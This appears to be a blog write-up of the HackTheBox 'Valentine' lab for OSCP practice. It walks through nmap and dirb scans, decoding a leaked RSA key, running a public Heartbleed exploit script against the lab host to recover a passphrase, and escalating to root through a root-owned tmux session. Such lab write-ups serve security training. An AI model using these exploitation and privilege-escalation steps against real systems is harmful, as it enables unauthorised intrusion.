DEV Community

Cover image for Writeup: HackTheBox Valentine - Without Metasploit (OSCP Prep)
Chris 'Huey' S
Chris 'Huey' S

Posted on

Writeup: HackTheBox Valentine - Without Metasploit (OSCP Prep)

Hello Again!

Just did Valentine from HackTheBox and wanted to provide a write up.

Let's Begin!

Command:

nmap -sC -sV -p- -T4 -p- -oN nmap.txt 10.10.10.79

  1. -sC = Default Scripts
  2. -sV = Probe open ports to determine service/Versions info
  3. -T4 = Set timing for faster output (0-5)
  4. -oN = Output to save it to a file
  5. -p- = Scan all 65535 ports

Alt Text

Ports Open:

22 TCP SSH OpenSSH 5.9p1

Not a ton of things to go off here so let's re-run the nmap tool with a more aggressive scan.

Command:

nmap -A -oN Aggressive.txt 10.10.10.79

Alt Text

Ports Open:

80 TCP Http Apache HttpD 2.2.22
443 TCP SSL/Http Appache 2.2.22

Heading over to the site we get a interesting landing page.

Alt Text

Now we are going to run some Directory search's.

Command:

dirb https://10.10.10.79 -o dirb.txt

Alt Text

Results:

Alt Text

The one that sticks out is the /dev/ site.

Alt Text

This turns up 2 different files. One is a hype_key and notes.txt.

Going to the notes.txt.

Alt Text

In here, there is a refence to fixing the decoder/encoder before going live.

On the other Directories there is a Encoder and Decoder but I didn't see anything too interesting.

We can see the Hex file when going to the hype_key location.

Alt Text

Instead of trying to use the Encoder and Decoder I am going to head over to Google to find a tool that will do the trick.

Alt Text

Then drop the Hex into the input.

This looks like its a RSA Private Key.

Alt Text

Now let's save the key to your Kali Machine.

Command:

echo "RSA Key Info..." > rsa.key

Alt Text

I tried using the newly acquired creds to login via the SSH option.

The -i option Selects a file from which the identity (private key) for public key authentication is read.

Command:

ssh -i rsa.key hype@10.10.10.79

I am making a guess that the user is hype based on the key information.

This doesn't work though.

Alt Text

I am going to try and run the Vuln scan to see if I missed anything.

Command:

nmap --script vuln -oN vuln.txt 10.10.10.79

Alt Text

Scrolling down we see that there is a vulnerability for HeartBleed.

A quick Summary on HeartBleed if you are not familiar.

Heartbleed was a security bug in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security (TLS) protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014. Heartbleed could be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS server or client. It resulted from improper input validation (due to a missing bounds check) in the implementation of the TLS heartbeat extension. Thus, the bug's name derived from heartbeat. The vulnerability was classified as a buffer over-read, a situation where more data can be read than should be allowed. Pulled from Wiki.

Command:

Searchsploit 32764.py

Now Copy this to your current directory.

Now lets run the Exploit!

Command:

python 32764.py 10.10.10.79 > heartbleed.txt

You don't have to send this to a file but its a lot to look through if you don't.

Alt Text

So what I am about to do is very choppy but it worked for me. Yes there are other ways to display the output but at this point I was getting annoyed with the box lol.

Command:

grep 'text' heartbleed.txt

Now scroll up to the 0130 line in the wall of text.

Alt Text

Let's break this with base64.

Command:

echo aGVh....= | base64 -d

Alt Text

Command:

chmod 600 rsa.key

ssh -i rsa.key hype@10.10.10.79

Don't forget to use the heartbleedbelievethehype password.

Alt Text

Alt Text

So I tried running the my normal Sudo commands and it broke my shell. So let's dig around a bit.

Going back to the Hype directory I notice that tmux is being run by root.

Command:

ps aux | grep tmux

Alt Text

Command:

tmux -S /.devs/dev_sess

Alt Text

Alt Text

Alt Text

Discussion (0)